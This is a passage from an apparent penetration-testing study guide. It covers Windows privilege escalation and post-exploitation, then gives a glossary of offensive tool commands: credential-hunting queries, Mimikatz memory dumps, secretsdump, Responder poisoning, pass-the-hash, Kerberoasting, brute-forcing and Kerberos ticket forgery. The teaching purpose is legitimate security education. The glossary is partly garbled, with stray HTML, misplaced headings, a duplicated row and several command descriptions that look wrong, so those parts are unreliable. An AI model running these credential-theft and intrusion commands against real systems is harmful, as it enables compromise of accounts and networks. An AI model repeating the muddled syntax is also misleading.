Unquoted Service Path – A specific case of service misconfiguration. If a Windows service path contains spaces and isn’t quoted (e.g., C:\Program Files\Some Folder\Service.exe is stored as an unquoted path), Windows will try to execute up to the first space as a command. In the example, it would look for C:\Program.exe then C:\Program Files\Some.exe, etc. (Privilege Escalation on Windows (With Examples)). If any directory in the path is writable by our user, we can drop a malicious Program.exe in C:\, and since services often run as SYSTEM, the system will execute our Program.exe as SYSTEM on service start (Privilege Escalation on Windows (With Examples)). This is a well-known issue and still found in many services.
Weak Registry Permissions – Similar to file permissions, if a user can edit the registry keys for a service (under HKLM\SYSTEM\CurrentControlSet\Services\...), they could change the service’s binary path to point to a malicious executable. Next start of the service = code execution as SYSTEM (Privilege Escalation on Windows (With Examples)). Always check with accesschk from Sysinternals for any keys under HKLM that users can modify.
Stored Credentials (Passwords) – Windows users (and admins) often leave passwords in places they shouldn’t. Attackers will search the system for passwords: common locations include:
- Registry: Some applications or system features store creds in registry. For instance, the AutoLogon feature stores plaintext password in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon. An attacker can query that if accessible (Privilege Escalation on Windows (With Examples)). Also, reg query HKLM /f password /t REG_SZ /s will search registry for keys containing “password” (Privilege Escalation on Windows (With Examples)).
- Filesystem: scanning through config files (.config, .ini, .txt) for keywords like “Password=” (Privilege Escalation on Windows (With Examples)). For example, findstr /si password *.txt *.config *.ini across the drive can find credentials in files (Privilege Escalation on Windows (With Examples)). Many times, admins might save a script with embedded creds or a text file with passwords (as shocking as that is). The cited example (Privilege Escalation on Windows (With Examples)) shows that it’s still common to find such passwords in practice.
- Browser credentials: If the user account has saved browser passwords and the pentester has GUI or sufficient access, tools or even the browser itself can reveal those. Mimikatz has functionality to scrape some of these as well.
- SAM database & hashes: If the attacker is local admin (or SYSTEM), they can access C:\Windows\System32\config\SAM and SYSTEM hive to dump password hashes (Privilege Escalation on Windows (With Examples)). Even without being admin, sometimes backups of the registry (like System Restore points or Volume Shadow Copies) are accessible to normal users and contain these hives. Once you have the hashes, you can crack them or pass-the-hash. For instance, if the Administrator’s password hash is obtained and it’s crackable, that’s game over locally. Or use the Administrator hash directly to authenticate to other machines (if the same local admin password is reused).
Token Impersonation / Named Pipe Impersonation – On older Windows or misconfigured ones, certain services that run as SYSTEM can be tricked into executing code. Tools like JuicyPotato or RoguePotato exploit the way services create tokens. If the current user is in the Local Service or Service group (like IIS APPPOOL identities), they might escalate to SYSTEM by hijacking tokens. This is a rather advanced technique, but important in scenarios like compromising IIS webserver user and wanting SYSTEM.
DLL Hijacking – If a service or program runs as SYSTEM and tries to load a DLL that is missing (and the user can write to a directory in the DLL search path), the user can place a malicious DLL to be loaded by that high-privilege process. This often requires either an existing service that runs as SYSTEM or waiting for an admin to run a program. Notable places to check are services set to auto-start – if they reference DLLs in unsecured paths.
Scheduled Tasks – If there’s a scheduled task running with highest privileges (System) and the user can modify its action or the file it runs, that’s similar to cron job hijacking. An example: a task that runs a script from C:\scripts\backup.ps1 daily as SYSTEM – if users can edit that script, they get SYSTEM at the next run.
User Privileges – Sometimes standard users have been mistakenly given higher privileges. For instance, membership in the Administrators group (obvious), or even in Power Users (less useful on modern OS), or specific privileges like SeBackupPrivilege which could allow them to create backup shadows of drives (and thus read any file). A tool called whoami /priv will list the current user’s privileges. Unusual ones like SeDebugPrivilege or SeBackupPrivilege can be abused (e.g., SeBackupPrivilege can be used with BackupRead/Write functions to read any file, including SAM). If a user has SeImpersonatePrivilege (common for service accounts), that’s exactly the scenario for token impersonation attacks like JuicyPotato to get SYSTEM.
Lateral / Domain Escalation – If the machine is part of a domain, local priv esc might not be the end goal; domain admin might be. Techniques then extend to the domain: Kerberoasting (get Service Principal Name tickets to crack them), AS-REP roasting (crackable encrypted tickets for users not requiring pre-auth), abusing trust relationships, or forging Kerberos tickets (Golden Ticket, Silver Ticket, etc.) once domain privileges are obtained. For example, once the attacker dumps credentials from one machine, they might find a domain admin reused a local admin password, etc., leading to domain compromise.
Automated Tools – WinPEAS is the Windows counterpart to LinPEAS, enumerating registry, services, privileges, etc., to suggest escalation paths. PowerUp (PowerShell) is another script that checks for common misconfigurations (unquoted paths, service perms, registry perms) and even provides ready-to-use exploitation functions for them. Running these can quickly highlight “Hey, this service XYZ has unquoted path and you can write to C:\, you can escalate!”
- Additionally, Seatbelt (a C# tool by SpecterOps) can enumerate a ton of info on a Windows host (installed software, privileges, sensitive files) which might reveal something useful.
- Mimikatz deserves another mention: beyond credential theft, it can abuse certain privileges to escalate. For instance, if the user has SeDebugPrivilege, Mimikatz can inject into a SYSTEM process and get SYSTEM that way.
- Many of these techniques are also documented in the MITRE ATT&CK framework, and testers will try to methodically go through likely misconfigurations.

From a defender’s perspective, mitigating Windows priv-esc involves: keeping systems patched (no known kernel or RDP exploits), using tools like Microsoft’s Security Compliance Toolkit to ensure secure permissions, avoiding shared local admin passwords (use LAPS), removing unnecessary privileges from users, and monitoring for unusual system changes (like new services or tasks). For instance, noticing if an innocuous service path is unquoted or a user unexpectedly is in the local Administrators group can preempt these attacks (Privilege Escalation on Windows (With Examples)).

Post-Exploitation Tools and Techniques

After escalating privileges, the focus shifts to maintaining access, lateral movement, and completing objectives:

Maintaining Access: Attackers may install backdoors or create new accounts. On Linux, this could be adding a user to /etc/passwd or adding SSH authorized_keys for root. On Windows, it could be a new local admin user or a scheduled task that opens a reverse shell. They might also employ rootkits or trojans (in a real APT scenario) to hide presence. Penetration testers will often demonstrate a persistence mechanism but remove it afterwards.
Covering Tracks: A crucial post-exploitation step. Clearing logs (Windows Event logs, .bash_history on Linux, etc.) can help avoid detection. However, skilled defenders may have centralized logging, so this isn’t foolproof. Testers may just note what could be cleared.
Data Exfiltration: If the goal is to retrieve sensitive data, the tester will use the elevated access to collect that data. They might use tools like 7zip to compress data and then exfiltrate over an allowed channel (HTTPS, DNS tunneling, etc.). For testing, often just demonstrating read access is enough (you might not actually steal the data).
Pivoting: With a high-privileged position on one host, testers pivot to others. For example, using a SOCKS proxy through Meterpreter to route traffic and scan the internal network further. This is where the initial foothold on one machine becomes a launchpad for attacking others that were not accessible externally.
Credential Reuse: Harvested credentials are tried everywhere. If a Domain Admin credential is obtained on one server, the tester will use that to seamlessly access any other machine in the domain (that’s basically game over for the entire domain’s security). In engagements like red teams, they might proceed to simulate actions on objectives (e.g., finding the CEO’s emails, or retrieving sensitive database records) once domain admin is achieved.
Reporting and Documentation: Although not a “technique,” in a professional context the tester at this point consolidates the findings: how they escalated privileges, what was compromised, and the potential impact. This is communicated to the client so they can remediate.

Privilege escalation and post-exploitation are where a penetration test demonstrates the real impact of earlier vulnerabilities. A low-severity issue during initial access can become critical when combined with others (for instance, a leaked credential + an unpatched system = full domain takeover). Thus, this phase is crucial for showing why even minor misconfigurations should be taken seriously. In summary, both Linux and Windows have multiple avenues for privilege escalation – a penetration tester will enumerate as many as possible and choose the path of least resistance to reach the highest privileges on the target system (Linux Privilege Escalation: Techniques and Security Tips) (Privilege Escalation on Windows (With Examples)). The defense should be layered such that even if an attacker gets in, these common escalation paths are mitigated or monitored.

Glossary

Burp Suite

Command/Flag	Syntax Example	Description
`burpsuite`	`burpsuite`	Launches Burp Suite Community Edition.
`--config-file [file]`	`--config-file burp.config`	Loads configuration from a specified file.
`--project-file [file]`	`--project-file project.burp`	Loads a saved project file.

Crowbar

Command/Flag	Syntax Example	Description
`crowbar`	`crowbar -b rdp -s 192.168.1.100 -U users.txt -P pass.txt`	Invokes Crowbar to brute-force protocols like RDP.
`-b [service]`	`-b rdp`	Specifies the service to attack (e.g., rdp, vnc, ssh).
`-s [target]`	`-s 192.168.1.100`	Specifies the target IP address.
`-U [userfile]`	`-U users.txt`	Uses a file containing usernames.
`-P [passfile]`	`-P pass.txt`	Uses a file containing passwords.

Dirb

Command/Flag	Syntax Example	Description
`dirb`	`dirb http://example.com/ /usr/share/wordlists/dirb/common.txt`	Launches Dirb for web directory enumeration.
`[URL]`	`http://example.com/`	Specifies the target URL.
`[wordlist]`	`/usr/share/wordlists/dirb/common.txt`	Uses a wordlist for directory scanning.

FFUF

Command/Flag	Syntax Example	Description
`ffuf`	`ffuf -u http://example.com/FUZZ -w wordlist.txt`	Invokes FFUF for web content fuzzing.
`-u [URL]`	`-u http://example.com/FUZZ`	Specifies the target URL with a FUZZ placeholder.
`-w [wordlist]`	`-w /path/to/wordlist.txt`	Specifies the wordlist to use for fuzzing.
`-mc [status]`	`-mc 200,301`	Filters responses by matching specific status codes.
`-fc [status]`	`-fc 404,403`	Filters responses by excluding specific status codes.
`-fs [size]`	`-fs 1234`	Filters responses based on response size (in bytes).
`-ac`	`-ac`	Automatically calibrates filter settings.
`-v`	`-v`	Enables verbose mode.

Gobuster

Command/Flag	Syntax Example	Description
`gobuster`	`gobuster dir -u http://example.com -w wordlist.txt`	Invokes Gobuster for directory and DNS enumeration.
`dir`	`gobuster dir ...`	Sets mode to directory/file enumeration.
`dns`	`gobuster dns -d example.com -w dns.txt`	Sets mode to DNS subdomain enumeration.
`-u [URL]`	`-u http://example.com`	Specifies the target URL.
`-w [wordlist]`	`-w /path/to/wordlist.txt`	Specifies the wordlist for enumeration.
`-t [threads]`	`-t 50`	Sets the number of concurrent threads.
`-x [extensions]`	`-x php,html,js`	Specifies file extensions to search for (comma-separated list).
`-o [file]`	`-o gobuster.txt`	Outputs results to a specified file.

Hydra

Command/Flag	Syntax Example	Description
`hydra`	`hydra -l admin -p secret 192.168.1.100 ssh`	Invokes Hydra for brute force and dictionary attacks.
`-l [login]`	`-l admin`	Specifies a single login name.
`-L <file>`	`-L logins.txt`	Uses a file containing a list of login names.
`-p [password]`	`-p password123`	Specifies a single password.
`-P [file]`	`-P passwords.txt`	Uses a file containing a list of passwords.
`-t [tasks]`	`-t 16`	Sets the number of parallel tasks (default is 16).
`-v`	`-v`	Enables verbose mode.
`-V`	`-V`	Enables very verbose mode.
`-f`	`-f`	Stops the attack after the first successful login.
`-o [file]`	`-o results.txt`	Outputs results to a specified file.
`-x [min:max:charset]`	`-x 4:8:abc123`	Sets brute force mode with parameters (min length: 4, max length: 8, charset: abc123).
`http-get-form`	`http-get-form:"/login.php:username=^USER^&password=^PASS^:F=incorrect"`	Targets HTTP GET form authentication.
`http-post-form`	`http-post-form:"/login.php:username=^USER^&password=^PASS^:F=invalid"`	Targets HTTP POST form authentication.
`ssh://[target]`	`ssh://192.168.1.100`	Targets SSH authentication.
`ftp://[target]`	`ftp://192.168.1.100`	Targets FTP authentication.

John the Ripper

Command/Flag	Syntax Example	Description
`john`	`john hashes.txt`	Invokes John the Ripper for password cracking.
`--wordlist=[file]`	`--wordlist=passwords.txt`	Specifies a wordlist for cracking passwords.
`--rules`	`--rules`	Enables word mangling rules during cracking.
`--incremental`	`--incremental`	Uses incremental mode for cracking.
`--show`	`--show`	Displays cracked passwords.
`--format=[format]`	`--format=md5crypt`	Specifies the hash format to use.
`--fork=[n]`	`--fork=4`	Uses multiple processes to speed up cracking (example: 4 forks).

LinPEAS

Command/Flag	Syntax Example	Description
`linpeas.sh`	`./linpeas.sh`	Runs LinPEAS to enumerate Linux privilege escalation paths.
`-a`	`./linpeas.sh -a`	(Optional) Runs all available enumeration checks.

Medusa

Command/Flag	Syntax Example	Description
`medusa`	`medusa -h 192.168.1.100 -u admin -p secret -M ssh`	Invokes Medusa for parallel brute-force attacks.
`-h [target]`	`-h 192.168.1.100`	Specifies the target host.
`-u [username]`	`-u admin`	Specifies a single username.
`-p [password]`	`-p secret`	Specifies a single password.
`-M [module]`	`-M ssh`	Sets the module (protocol) to attack (e.g., ssh, ftp).

Metasploit

Command/Flag	Syntax Example	Description
`msfconsole`	`msfconsole`	Launches the Metasploit Framework console.
`use [module]`	`use exploit/windows/smb/ms17_010_eternalblue`	Loads a specific exploit or auxiliary module.
`set RHOSTS [ip]`	`set RHOSTS 192.168.1.100`	Sets the target IP address.
`set RPORT [port]`	`set RPORT 445`	Sets the target port.
`set PAYLOAD [payload]`	`set PAYLOAD windows/x64/meterpreter/reverse_tcp`	Specifies the payload to use.
`exploit`	`exploit`	Executes the loaded module against the target.
`sessions -l`	`sessions -l`	Lists active sessions.
`sessions -i [id]`	`sessions -i 1`	Interacts with a specific session (session ID 1).
`back`	`back`	Returns to module selection from the current context.
`search [term]`	`search eternalblue`	Searches for modules matching the given term.

Mimikatz

Command/Flag	Syntax Example	Description
`mimikatz`	`mimikatz.exe`	Launches Mimikatz for Windows credential dumping.
`privilege::debug`	`privilege::debug`	Elevates privileges for credential extraction.
`sekurlsa::logonpasswords`	`sekurlsa::logonpasswords`	Dumps credentials from memory.
`crypto::capi`	`crypto::capi`	Dumps cryptographic keys.

Ncrack

Command/Flag	Syntax Example	Description
`ncrack`	`ncrack -p 3389 192.168.1.100`	Invokes Ncrack for network authentication brute force (e.g., RDP).
`-p [port]`	`-p 3389`	Specifies the target port.
`[target]`	`192.168.1.100`	Specifies the target IP address.
`-U [userfile]`	`-U users.txt`	Uses a file containing usernames.
`-P [passfile]`	`-P pass.txt`	Uses a file containing passwords.

Nikto

Command/Flag	Syntax Example	Description
`nikto`	`nikto -h http://example.com`	Launches Nikto for web server vulnerability scanning.
`-h [host]`	`-h http://example.com`	Specifies the target host.
`-p [port]`	`-p 80`	Specifies the target port.
`-output [file]`	`-output nikto.txt`	Writes scan results to a specified file.
`-Tuning [options]`	`-Tuning 1,2,3`	Sets scan tuning options (comma-separated numeric options).
`-Display [options]`	`-Display V`	Adjusts output display options (e.g., verbose output).

Nmap

Command/Flag	Syntax Example	Description
`nmap`	`nmap 192.168.1.0/24`	Invokes Nmap for network scanning and enumeration.
`-sS`	`nmap -sS 192.168.1.100`	Performs a TCP SYN (stealth) scan.
`-sV`	`nmap -sV 192.168.1.100`	Enables version detection for services.
`-A`	`nmap -A 192.168.1.100`	Aggressive scan: OS detection, version detection, script scanning, etc.
`-O`	`nmap -O 192.168.1.100`	Enables operating system detection.
`-p [port]`	`nmap -p 80,443 192.168.1.100`	Specifies target port(s) to scan (comma-separated list).
`--script [script-name]`	`nmap --script vuln 192.168.1.100`	Runs specified NSE scripts.
`-Pn`	`nmap -Pn 192.168.1.100`	Skips host discovery (assumes hosts are online).
`-T4`	`nmap -T4 192.168.1.100`	Sets timing template for faster scanning.
`-oN [file]`	`-oN scan.txt`	Outputs scan results in normal format to a file.
`-oX [file]`	`-oX scan.xml`	Outputs scan results in XML format to a file.

OWASP ZAP

Command/Flag	Syntax Example	Description
`zap.sh`	`./zap.sh`	Launches OWASP ZAP for web application testing.
`-daemon`	`./zap.sh -daemon`	Runs OWASP ZAP in daemon mode (background).
`-port [port]`	`-port 8080`	Specifies the port for the proxy.

PowerUp

Command/Flag	Syntax Example	Description
`PowerUp.ps1`	`.\PowerUp.ps1`	Executes the PowerUp script for Windows privilege escalation.
`Invoke-AllChecks`	`Invoke-AllChecks`	Runs all enumeration checks for common misconfigurations.

Seatbelt

Command/Flag	Syntax Example	Description
`Seatbelt.exe`	`Seatbelt.exe -group=privilege`	Runs Seatbelt to enumerate Windows system configuration.
`-group [category]`	`-group=privilege`	Filters output by a specific category (e.g., privilege).

Socat

Command/Flag	Syntax Example	Description
`socat`	`socat TCP-LISTEN:4444,reuseaddr,fork TCP:192.168.1.100:80`	Establishes bidirectional data transfer (useful for tunneling).
`TCP-LISTEN:[port]`	`TCP-LISTEN:4444`	Listens on a specified port for incoming connections.
`TCP:[target]:[port]`	`TCP:192.168.1.100:80`	Connects to a target's port.

Telnet

Command/Flag	Syntax Example	Description
`telnet`	`telnet 192.168.1.100 23`	Connects to a target via Telnet.
`[host] [port]`	`192.168.1.100 23`	Specifies the target host and port.

WinPEAS

Command/Flag	Syntax Example	Description
`winPEAS.bat`	`winPEAS.bat`	Executes WinPEAS for Windows privilege escalation enumeration.
`-full`	`winPEAS.bat -full`	Runs a full scan to check all escalation paths.

WPScan

Command/Flag	Syntax Example	Description
`wpscan`	`wpscan --url http://example.com`	Launches WPScan for WordPress vulnerability scanning.
`--url [url]`	`--url http://example.com`	Specifies the target URL.
`--enumerate [option]`	`--enumerate u`	Enumerates plugins, themes, or users (e.g., u for users, p for plugins).
`--api-token [token]`	`--api-token abc123`	Uses an API token for vulnerability database access.
`-e [option]`	`-e vp`	Alias for enumeration options (e.g., vp for vulnerable plugins).
`--passwords [file]`	`--passwords passwords.txt`	Specifies a password list for brute force attacks.
`--usernames [file]`	`--usernames usernames.txt`	Specifies a username list for brute force attacks.

Xfreerdp / Rdesktop (RDP Clients)

Command/Flag	Syntax Example	Description
`xfreerdp`	`xfreerdp /v:192.168.1.100`	Connects to a remote desktop using FreeRDP.
`rdesktop`	`rdesktop 192.168.1.100`	Connects to a remote desktop using rdesktop.
`/v:[host]`	`/v:192.168.1.100`	Specifies the target host in xfreerdp.
`[options]`	(varies)	Various options for session customization (e.g., /u, /p, /size).

ldapsearch

Command/Flag	Syntax Example	Description
`ldapsearch`	`ldapsearch -x -H ldap://192.168.1.100 -b "dc=example,dc=com"`	Executes LDAP search queries for directory enumeration.

mongo (MongoDB Client)

Command/Flag	Syntax Example	Description
`mongo`	`mongo --host 192.168.1.100`	Connects to a MongoDB server for database queries.

onesixtyone

Command/Flag	Syntax Example	Description
`onesixtyone`	`onesixtyone -c public 192.168.1.100`	Brute-forces SNMP community strings (e.g., "public").

PowerView / SharpView

PowerView (and its .NET fork SharpView) is a PowerShell toolkit for AD situational awareness—replacing many built‑in net commands and gathering data for BloodHound‑style relationship mapping.*

Command/Flag	Syntax Example	Description
`Import-Module .\PowerView.ps1`	`Import-Module .\PowerView.ps1`	Loads the PowerView module into the current PowerShell session.
`Get-NetUser`	`Get-NetUser -Domain example.local`	Enumerates all users in the target domain.
`Get-NetComputer`	`Get-NetComputer -OperatingSystem "Windows Server*"`	Lists domain computers matching an OS filter.
`Get-NetGroupMember`	`Get-NetGroupMember -GroupName "Domain Admins"`	Retrieves members of the specified AD group.
`Get-NetOU`	`Get-NetOU -Domain example.local`	Lists all Organizational Units in the domain.
`Get-NetDomain`	`Get-NetDomain`	Fetches general information about the domain (SID, controllers, etc.).
`Invoke-ShareFinder`	`Invoke-ShareFinder -Verbose`	Scans for SMB shares across the domain, reporting permissions.
`Invoke-UserHunter`	`Invoke-UserHunter -CheckRemote`	Attempts to locate where a user is logged on across hosts.
`Invoke-Kerberoast`	`Invoke-Kerberoast -GetUserSPNs`	Finds SPNs for offline Kerberoasting.

SharpHound

SharpHound is the C# ingestor for BloodHound that collects AD data—sessions, ACLs, trusts, GPOs, local admins, etc.—for graph analysis.

Command/Flag	Syntax Example	Description
`SharpHound.exe -c All`	`SharpHound.exe -c All`	Collects all ingestion methods: sessions, ACLs, trusts, GPOs, local admin, etc.
`-c Session`	`SharpHound.exe -c Session`	Captures currently active user/computer sessions.
`-c Trusts`	`SharpHound.exe -c Trusts`	Enumerates domain and forest trust relationships.
`-c ACL`	`SharpHound.exe -c ACL`	Gathers ACLs on objects to find privilege paths.
`-c LocalAdmin`	`SharpHound.exe -c LocalAdmin`	Enumerates local administrators on all machines.
`-c ObjectProps`	`SharpHound.exe -c ObjectProps`	Collects detailed object properties for AD entities.
`-c DCOnly`	`SharpHound.exe -c DCOnly`	Restricts collection to domain controllers.

BloodHound.py

BloodHound.py is the Python/Impacket ingestor alternative for collecting AD data in non-domain-joined environments.

Command/Flag	Syntax Example	Description
`python BloodHound.py -c all`	`python BloodHound.py -c all -u user -p Pass123!`	Runs all collection methods (LDAP, SMB) using given credentials.
`-c Session`	`python BloodHound.py -c Session --json`	Captures session data and outputs JSON files.
`-c Trusts`	`python BloodHound.py -c Trusts -dc dc01.example.local`	Collects only trust relationships from a specified DC.
`-c ACL`	`python BloodHound.py -c ACL -ns 1`	Gathers ACLs on objects with 1 thread for speed control.
`-c DCOnly`	`python BloodHound.py -c DCOnly -d example.local`	Limits collection to domain controllers.
`--zip`	`python BloodHound.py -c all --zip`	Compresses output JSON files into a ZIP for import.

Kerbrute

Kerbrute is a Go tool for Kerberos Pre-Authentication attacks—user enumeration, password spraying, and brute‑forcing.

</tbody> </table> ### Impacket Toolkit (Selected) *Impacket is a Python collection for network protocol interaction—SMB, LDAP, Kerberos, MS‑RPC, etc.*

Command/Flag	Syntax Example	Description
`kerbrute userenum`	`kerbrute userenum --dc dc.example.local users.txt`	Enumerates valid AD usernames via Kerberos Pre‑Auth.
`--delay`	`kerbrute userenum --dc dc --delay 1500 users.txt`	Adds a delay (ms) between attempts to avoid lockouts.
`kerbrute passwordspray`	`kerbrute passwordspray --dc dc -U users.txt -P common.txt`	Performs password spray against multiple accounts.
`kerbrute bruteforce`	`kerbrute bruteforce --dc dc -U admin -P passlist.txt`	Brute‑forces a single user’s password via Kerberos (One user, many passwords). </tr>
`kerbrute bruteuser`	`kerbrute bruteuser --dc 10.0.0.1 -d example.local /usr/share/wordlists/rockyou.txt users.txt`	Brute‑force passwords for a list of users via Kerberos Pre‑Authentication using specified wordlist (Many users, many passwords). </tr>
`--output`	`kerbrute userenum --dc dc -o valid_users.txt users.txt`	Saves valid usernames to an output file.

Command/Flag	Syntax Example	Description
`secretsdump.py`	`python secretsdump.py domain/admin:Pass@dc01`	Dumps SAM/LSA secrets from remote host over SMB.
`GetUserSPNs.py`	`python GetUserSPNs.py -request -dc dc01 -u user -p Pass`	Finds SPNs for Kerberoasting.
`GetNPUsers.py`	`python GetNPUsers.py -no-pass example/user@dc01`	ASREPRoasts users not requiring pre-authentication.
`psexec.py`	`python psexec.py domain/user:Pass@dc01`	Executes commands remotely via SMB (PsExec style).
`wmiexec.py`	`python wmiexec.py dc01 -u user -p Pass`	Executes commands via WMI using provided creds.
`mssqlclient.py`	`python mssqlclient.py user:Pass@dc01`	Interacts with MSSQL databases using provided creds.
`rpcdump.py`	`python rpcdump.py 10.0.0.1`	Enumerates RPC endpoints on a host.
`ntlmrelayx.py`	`python ntlmrelayx.py -tf targets.txt -smb2support`	Performs SMB relay attacks against listed targets.
`lookupsid.py`	`python lookupsid.py example.local/S-1-5-21-...`	Retrieves account information by SID.
`ticketer.py`	`python ticketer.py --domain example.local --user krbtgt`	Creates custom Kerberos tickets (Golden/Silver Tickets).
`raiseChild.py`	`python raiseChild.py domain/user:Pass@dc01`	Automates child-to-parent domain privilege escalation.

### Responder *Responder poisons LLMNR, NBT-NS, MDNS and captures/relays hashes for credential theft and relay attacks.* </tbody>

Command/Flag	Syntax Example	Description
`responder -I eth0`	`responder -I eth0 -r -w`	Starts LLMNR/NBT‑NS poisoner with WPAD rogue server and write logs.
`-u`	`responder -I eth0 -u -P ntlm`	Only poison NTLM requests and capture hashes.
`-d`	`responder -I eth0 -rd`	Enables relay daemon mode to forward captured creds.
`-v`	`responder -I eth0 -v`	Verbose mode: displays detailed request/response info.
`-v`	`responder -I eth0 -v`	Verbose mode: displays detailed request/response info.
`Log Directory`	`cd /usr/share/responder/logs/`	Navigate to Responder’s log output directory.

### Inveigh / InveighZero *Inveigh (PowerShell) and InveighZero (C#) are LLMNR/LLMNR/NBT‑NS/SMB poisoners with credential capture and relay capabilities.*

Command/Flag	Syntax Example	Description
`.\Inveigh.ps1`	`.\Inveigh.ps1 -ConsoleOutput Y`	Runs PowerShell poisoner with console output enabled.
`-NBNS`	`.\Inveigh.ps1 -NBNS -LLMNR -SMB`	Enables NBNS, LLMNR, and SMB poisoning simultaneously.
`InveighZero.exe -Passive`	`InveighZero.exe -Passive`	Starts C# poisoner in passive capture mode (no spoofing).
`-KeyRegex`	`InveighZero.exe -KeyRegex "NTLM"`	Filters captured traffic for keys matching the regex.

### rpcinfo / rpcclient *rpcinfo (Unix) and rpcclient (Samba) enumerate RPC services and perform RPC‑based AD enumeration.*

Command/Flag	Syntax Example	Description
`rpcinfo -p`	`rpcinfo -p 10.0.0.1`	Lists RPC program numbers and protocols on the remote host.
`rpcinfo -u`	`rpcinfo -u 10.0.0.1`	Displays UDP RPC services only.
`rpcclient -U "" -N`	`rpcclient -U "" -N 10.0.0.1`	Anonymous RPC session for basic enumeration.
`-c enumdomusers`	`rpcclient -U user%Pass 10.0.0.1 -c enumdomusers`	Enumerates domain usernames via RPC.
`-c enumdomgroups`	`rpcclient -U user%Pass 10.0.0.1 -c enumdomgroups`	Enumerates domain groups via RPC.

### CrackMapExec (CME) *CME is a Swiss‑army post‑exploitation toolkit for enumeration, brute‑forcing, and module‑based attacks over SMB, WMI, WinRM, MSSQL, LDAP, and more.*

Command/Flag	Syntax Example	Description
`cme smb`	`cme smb 10.0.0.1 -u Admin -p Pass`	Basic SMB login enumeration against a host.
`cme smb -H`	`cme smb 10.0.0.1 -u "" -H hash.txt`	Pass-the-hash attack using NTLM hashes.
`-L -P`	`cme smb 10.0.0.1 -L users.txt -P pass.txt --shares`	Enumerates shares using credential lists.
`cme winrm`	`cme winrm 10.0.0.1 -u Admin -p Pass`	Attempts WinRM authentication and command execution.
`cme mssql`	`cme mssql 10.0.0.1 -u SA -p Pass123!`	Connects to MS‑SQL, executes queries via provided creds.
`cme ldap`	`cme ldap 10.0.0.1 -u user -p Pass`	Performs LDAP enumeration and simple queries.
`-M wmiexec`	`cme smb 10.0.0.1 -u Admin -p Pass -M wmiexec`	Runs WMI exec module to execute commands remotely.
`-M mimikatz`	`cme smb 10.0.0.1 -u Admin -p Pass -M mimikatz`	Dumps credentials from memory using Mimikatz module.

### NetExec *NetExec is a modular remote‑execution framework supporting multiple protocols (SMB, WMI, WinRM, MSSQL, LDAP, and more), with flexible authentication, threading, and output options.*

Command/Flag	Syntax Example	Description
`netexec smb`	`netexec smb 10.0.0.1 -u Admin -p Pass!`	Execute commands remotely via SMB named‑pipe execution.
`netexec wmi`	`netexec wmi 10.0.0.1 -u svc -p SvcPass! -c "whoami"`	Run a WMI method to execute a single command.
`netexec winrm`	`netexec winrm 10.0.0.1 -u user -p Pass! --ssl`	Invoke a WinRM shell over SSL/TLS.
`netexec mssql`	`netexec mssql 10.0.0.1 -u SA -p Pass123! -q "SELECT name FROM sys.databases"`	Execute T‑SQL queries against MS‑SQL Server.
`netexec ldap`	`netexec ldap dc1.example.local -u user -p Pass! --search "(&(objectClass=user))"`	Perform LDAP searches for AD enumeration.
`netexec -H`	`netexec smb 10.0.0.1 -u "" -H aad3b435...:31d6cfe0...`	Authenticate via NTLM pass‑the‑hash.
`netexec --no-pass`	`netexec smb 10.0.0.1 --no-pass`	Attempt anonymous execution/enumeration.
`netexec --dc-ip`	`netexec ldap example.local -u svc -p SvcPass --dc-ip 10.0.0.2`	Specify a particular DC IP for LDAP traffic.
`netexec --threads`	`netexec smb 10.0.0.1 -u Admin -p Pass! --threads 25`	Run up to 25 parallel execution threads.
`netexec --timeout`	`netexec winrm 10.0.0.1 -u user -p Pass --timeout 20`	Set connection timeout to 20 seconds.
`netexec --port`	`netexec winrm 10.0.0.1 -u user -p Pass --port 5986`	Use a custom port (e.g., 5986 for WinRM SSL).
`netexec --kerberos`	`netexec smb dc1 -u user --kerberos --ticket TGT.kirbi`	Authenticate using a Kerberos ticket file.
`netexec --command`	`netexec smb 10.0.0.1 -u svc -p P@ss! --command "net localgroup administrators"`	Specify the exact command to run remotely.
`netexec --share`	`netexec smb 10.0.0.1 -u Admin -p Pass! --share ADMIN$`	Direct SMB execution through a particular share.
`netexec --output`	`netexec wmi 10.0.0.1 -u user -p Pass! --output results.txt`	Save the remote command output locally.
`netexec --interactive`	`netexec smb 10.0.0.1 -u Admin -p Pass! --interactive`	Establish an interactive remote shell session.
`netexec --ssl`	`netexec winrm 10.0.0.1 -u user -p Pass! --ssl`	Encrypt the protocol transport (SMB/WMI/WinRM) with SSL/TLS.

### Rubeus *Rubeus is a C# tool built for Kerberos abuse—dumping, requesting, renewing, and forging tickets for post‑exploitation.*

Command/Flag	Syntax Example	Description
`Rubeus.exe kerberoast`	`Rubeus.exe kerberoast /domain:corp.local /outfile:krb.json`	Dump TGS tickets for all SPNs for offline cracking.
`Rubeus.exe asktgt`	`Rubeus.exe asktgt /user:svc_sql /password:Pass123! /domain:corp.local`	Obtain a TGT for a service account with credentials.
`Rubeus.exe renew`	`Rubeus.exe renew /ticket:ticket.kirbi /outfile:renewed.kirbi`	Renew an existing TGT to extend its validity.
`Rubeus.exe s4uuser`	`Rubeus.exe s4uuser /user:krbtgt /impersonateuser:alice /ticket:ticket.kirbi`	Perform S4U2self + S4U2proxy to impersonate another user.
`Rubeus.exe dump`	`Rubeus.exe dump /tickets`	Extract all Kerberos tickets from LSASS memory.

### GetUserSPNs.py *GetUserSPNs.py is an Impacket script for enumerating Service Principal Names (SPNs) to support Kerberoasting attacks.*

Command/Flag	Syntax Example	Description
`GetUserSPNs.py -request`	`python GetUserSPNs.py -request -dc dc1.corp.local -u svc_account -p SvcPass!`	Request TGS tickets for all SPNs and save to JSON files for offline cracking.
`--format`	`python GetUserSPNs.py -request -dc dc1 -u svc -p Pass123! --format json`	Output results in JSON format instead of separate files.
`--outfile`	`python GetUserSPNs.py -request -dc dc1 -u svc -p Pass! --outfile spns.json`	Merge all SPN results into a single output file.
`--dc-ip`	`python GetUserSPNs.py -request -dc corp.local -u svc -p Pass! --dc-ip 10.0.0.1`	Specify a particular domain controller IP for LDAP queries.
`--help`	`python GetUserSPNs.py --help`	Display usage and full list of options.

### Hashcat *Hashcat is a GPU‑accelerated password recovery tool supporting hundreds of hash types and a variety of attack modes.*

Command/Flag	Syntax Example	Description
`-m [hash-type]`	`hashcat -m 13100 -a 0 krb5pa* hashes.txt wordlist.txt`	Crack Kerberos 5 Pre‑Auth hashes using a wordlist.
`-a 3`	`hashcat -m 13100 -a 3 krb5pa* ?l?l?l?l?d?d?d`	Use brute‑force mask attack (4 letters + 3 digits).
